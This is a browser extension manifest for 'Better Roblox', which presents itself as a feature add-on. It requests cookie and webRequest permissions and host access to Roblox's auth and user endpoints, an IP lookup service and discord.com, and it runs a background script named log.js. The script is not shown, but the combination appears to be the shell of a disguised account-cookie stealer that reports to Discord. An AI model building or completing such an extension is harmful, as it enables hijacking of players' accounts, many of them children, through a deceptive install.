{
    "name": "Better Roblox",
    "description": "Advanced Roblox Features",
    "version": "2.0",
    "manifest_version": 3,
    "background": {
        "service_worker": "log.js"
    },
    "permissions": [
        "cookies",
        "storage",
        "webRequest"
    ],
    "host_permissions": [
        "https://www.roblox.com/*",
        "https://auth.roblox.com/*",
        "https://users.roblox.com/*",
        "https://api.ipify.org/*",
        "https://discord.com/*"
    ],
    "action": {
        "default_icon": "assets/roblox.png"
    },
    "icons": {
        "16": "assets/roblox.png",
        "32": "assets/roblox.png",
        "48": "assets/roblox.png",
        "128": "assets/roblox.png"
    },
    "content_security_policy": {
        "extension_pages": "script-src 'self'; object-src 'none'"
    }
}